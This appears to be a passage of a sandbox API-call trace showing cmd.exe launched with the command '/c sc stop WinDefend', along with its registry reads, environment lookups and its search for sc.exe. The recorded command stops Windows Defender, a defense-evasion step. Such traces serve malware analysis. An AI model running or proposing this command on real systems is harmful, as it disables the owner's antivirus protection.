(in: lpSystemTimeAsFileTime=0x3dfac4 | out: lpSystemTimeAsFileTime=0x3dfac4*(dwLowDateTime=0xe350b970, dwHighDateTime=0x1d4be3a)) [0105.881] GetCurrentProcessId () returned 0x924 [0105.881] GetCurrentThreadId () returned 0x920 [0105.881] GetTickCount () returned 0x27c9e [0105.881] QueryPerformanceCounter (in: lpPerformanceCount=0x3dfabc | out: lpPerformanceCount=0x3dfabc*=1818325300000) returned 1 [0105.882] GetModuleHandleA (lpModuleName=0x0) returned 0x4a550000 [0105.882] __set_app_type (_Type=0x1) [0105.882] __p__fmode () returned 0x75ca31f4 [0105.882] __p__commode () returned 0x75ca31fc [0105.882] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5721a6) returned 0x0 [0105.882] __getmainargs (in: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c, _DoWildCard=0, _StartInfo=0x4a574140 | out: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c) returned 0 [0105.883] GetCurrentThreadId () returned 0x920 [0105.883] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x920) returned 0x60 [0105.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0105.883] GetProcAddress (hModule=0x76540000, lpProcName="SetThreadUILanguage") returned 0x7656a84f [0105.883] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.883] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3dfa54 | out: phkResult=0x3dfa54*=0x0) returned 0x2 [0105.883] VirtualQuery (in: lpAddress=0x3dfa8b, lpBuffer=0x3dfa24, dwLength=0x1c | out: lpBuffer=0x3dfa24*(BaseAddress=0x3df000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.883] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x3dfa24, dwLength=0x1c | out: lpBuffer=0x3dfa24*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0105.883] VirtualQuery (in: lpAddress=0x2e1000, lpBuffer=0x3dfa24, dwLength=0x1c | out: lpBuffer=0x3dfa24*(BaseAddress=0x2e1000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0105.883] VirtualQuery (in: lpAddress=0x2e3000, lpBuffer=0x3dfa24, dwLength=0x1c | out: lpBuffer=0x3dfa24*(BaseAddress=0x2e3000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.884] VirtualQuery (in: lpAddress=0x3e0000, lpBuffer=0x3dfa24, dwLength=0x1c | out: lpBuffer=0x3dfa24*(BaseAddress=0x3e0000, AllocationBase=0x3e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0105.884] GetConsoleOutputCP () returned 0x1b5 [0105.884] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0105.884] SetConsoleCtrlHandler (HandlerRoutine=0x4a56e72a, Add=1) returned 1 [0105.884] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.884] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0105.884] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.884] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0105.884] _get_osfhandle (_FileHandle=1) returned 0x7 [0105.884] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0105.885] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.885] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0105.885] _get_osfhandle (_FileHandle=0) returned 0x3 [0105.885] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0105.885] GetEnvironmentStringsW () returned 0x852370* [0105.885] FreeEnvironmentStringsW (penv=0x852370) returned 1 [0105.885] GetEnvironmentStringsW () returned 0x852370* [0105.886] FreeEnvironmentStringsW (penv=0x852370) returned 1 [0105.886] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de9c4 | out: phkResult=0x3de9c4*=0x68) returned 0x0 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x0, lpData=0x3de9d0*=0x0, lpcbData=0x3de9c8*=0x1000) returned 0x2 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x1, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x0, lpData=0x3de9d0*=0x1, lpcbData=0x3de9c8*=0x1000) returned 0x2 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x0, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x40, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x40, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x0, lpData=0x3de9d0*=0x40, lpcbData=0x3de9c8*=0x1000) returned 0x2 [0105.886] RegCloseKey (hKey=0x68) returned 0x0 [0105.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3de9c4 | out: phkResult=0x3de9c4*=0x68) returned 0x0 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x0, lpData=0x3de9d0*=0x40, lpcbData=0x3de9c8*=0x1000) returned 0x2 [0105.886] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x1, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.887] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x0, lpData=0x3de9d0*=0x1, lpcbData=0x3de9c8*=0x1000) returned 0x2 [0105.887] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x0, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.887] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x9, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.887] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x4, lpData=0x3de9d0*=0x9, lpcbData=0x3de9c8*=0x4) returned 0x0 [0105.887] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3de9cc, lpData=0x3de9d0, lpcbData=0x3de9c8*=0x1000 | out: lpType=0x3de9cc*=0x0, lpData=0x3de9d0*=0x9, lpcbData=0x3de9c8*=0x1000) returned 0x2 [0105.887] RegCloseKey (hKey=0x68) returned 0x0 [0105.887] time (in: timer=0x0 | out: timer=0x0) returned 0x5c5b0e5b [0105.887] srand (_Seed=0x5c5b0e5b) [0105.887] GetCommandLineW () returned="/c sc stop WinDefend" [0105.887] GetCommandLineW () returned="/c sc stop WinDefend" [0105.887] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.888] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x854760, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0105.888] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf [0105.888] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.888] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.888] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0105.888] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0105.888] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0105.888] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0105.888] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0105.888] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0105.888] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0105.888] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0105.888] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0105.888] GetEnvironmentStringsW () returned 0x852370* [0105.889] FreeEnvironmentStringsW (penv=0x852370) returned 1 [0105.889] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.889] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.889] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0105.889] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0105.889] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0105.889] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0105.889] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0105.889] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0105.889] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0105.889] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0105.889] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3df790 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3df790, lpFilePart=0x3df78c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3df78c*="system32") returned 0x13 [0105.889] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0105.890] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3df50c | out: lpFindFileData=0x3df50c) returned 0x8407f0 [0105.890] FindClose (in: hFindFile=0x8407f0 | out: hFindFile=0x8407f0) returned 1 [0105.890] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3df50c | out: lpFindFileData=0x3df50c) returned 0x8407f0 [0105.890] FindClose (in: hFindFile=0x8407f0 | out: hFindFile=0x8407f0) returned 1 [0105.890] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0105.890] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0105.890] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0105.890] GetEnvironmentStringsW () returned 0x852370* [0105.890] FreeEnvironmentStringsW (penv=0x852370) returned 1 [0105.890] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.891] GetConsoleOutputCP () returned 0x1b5 [0105.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0105.903] GetUserDefaultLCID () returned 0x409 [0105.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a574950, cchData=8 | out: lpLCData=":") returned 2 [0105.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3df8d0, cchData=128 | out: lpLCData="0") returned 2 [0105.908] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3df8d0, cchData=128 | out: lpLCData="0") returned 2 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3df8d0, cchData=128 | out: lpLCData="1") returned 2 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a574940, cchData=8 | out: lpLCData="/") returned 2 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a574d80, cchData=32 | out: lpLCData="Mon") returned 4 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a574d40, cchData=32 | out: lpLCData="Tue") returned 4 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a574d00, cchData=32 | out: lpLCData="Wed") returned 4 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a574cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a574c80, cchData=32 | out: lpLCData="Fri") returned 4 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a574c40, cchData=32 | out: lpLCData="Sat") returned 4 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a574c00, cchData=32 | out: lpLCData="Sun") returned 4 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a574930, cchData=8 | out: lpLCData=".") returned 2 [0105.909] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a574920, cchData=8 | out: lpLCData=",") returned 2 [0105.909] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.910] GetConsoleTitleW (in: lpConsoleTitle=0x841030, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.910] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0105.910] GetProcAddress (hModule=0x76540000, lpProcName="CopyFileExW") returned 0x76573b92 [0105.910] GetProcAddress (hModule=0x76540000, lpProcName="IsDebuggerPresent") returned 0x76554a5d [0105.910] GetProcAddress (hModule=0x76540000, lpProcName="SetConsoleInputExeNameW") returned 0x7656a79d [0105.911] _wcsicmp (_String1="sc", _String2=")") returned 74 [0105.911] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0105.911] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0105.911] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0105.911] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0105.911] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0105.911] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0105.912] GetConsoleTitleW (in: lpConsoleTitle=0x3df5c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.912] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0105.912] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0105.912] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0105.912] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0105.912] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0105.912] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0105.912] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0105.912] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0105.912] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0105.912] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0105.912] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0105.912] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0105.912] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0105.912] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0105.912] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0105.912] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0105.913] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0105.913] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0105.913] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0105.913] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0105.913] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0105.913] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0105.913] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0105.913] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0105.913] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0105.913] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0105.913] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0105.913] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0105.913] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0105.913] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0105.913] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0105.913] _wcsicmp (_String1="sc", _String2="START") returned -17 [0105.913] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0105.913] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0105.913] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0105.913] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0105.913] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0105.913] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0105.913] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0105.913] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0105.913] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0105.913] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0105.913] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0105.913] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0105.913] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0105.913] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0105.913] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0105.913] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0105.913] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0105.913] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0105.913] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0105.913] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0105.913] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0105.913] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0105.913] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0105.913] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0105.913] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0105.913] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0105.913] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0105.913] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0105.913] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0105.913] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0105.913] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0105.914] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0105.914] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0105.914] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0105.914] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0105.914] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0105.914] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0105.914] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0105.914] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0105.914] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0105.914] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0105.914] _wcsicmp (_String1="sc", _String2="START") returned -17 [0105.914] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0105.914] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0105.914] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0105.914] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0105.914] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0105.914] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0105.914] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0105.914] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0105.914] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0105.914] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0105.914] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0105.914] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0105.914] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0105.914] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0105.914] SetErrorMode (uMode=0x0) returned 0x0 [0105.914] SetErrorMode (uMode=0x1) returned 0x0 [0105.914] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8557d0, lpFilePart=0x3df0e8 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3df0e8*="system32") returned 0x13 [0105.914] SetErrorMode (uMode=0x0) returned 0x1 [0105.915] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf [0105.915] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0105.921] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x3dee64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dee64) returned 0x841310 [0105.922] FindClose (in: hFindFile=0x841310 | out: hFindFile=0x841310) returned 1 [0105.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x3dee64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dee64) returned 0xffffffff [0105.922] GetLastError () returned 0x2 [0105.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x3dee64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3dee64) returned 0x841310 [0105.922] FindClose (in: hFindFile=0x841310 | out: hFindFile=0x841310) returned 1 [0105.922] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0105.922] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0105.922] GetConsoleTitleW (in: lpConsoleTitle=0x3df35c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.923] InitializeProcThreadAttributeList (in: lpAttributeList=0x3df1e4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3df2ac | out: lpAttributeList=0x3df1e4, lpSize=0x3df2ac) returned 1 [0105.923] UpdateProcThreadAttribute (in: lpAttributeList=0x3df1e4, dwFlags=0x0, Attribute=0x60001, lpValue=0x3df2a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3df1e4, lpPreviousValue=0x0) returned 1 [0105.923] GetStartupInfoW (in: lpStartupInfo=0x3df1a0 | out: lpStartupInfo=0x3df1a0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="Path=%S", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.923] _wcsnicmp 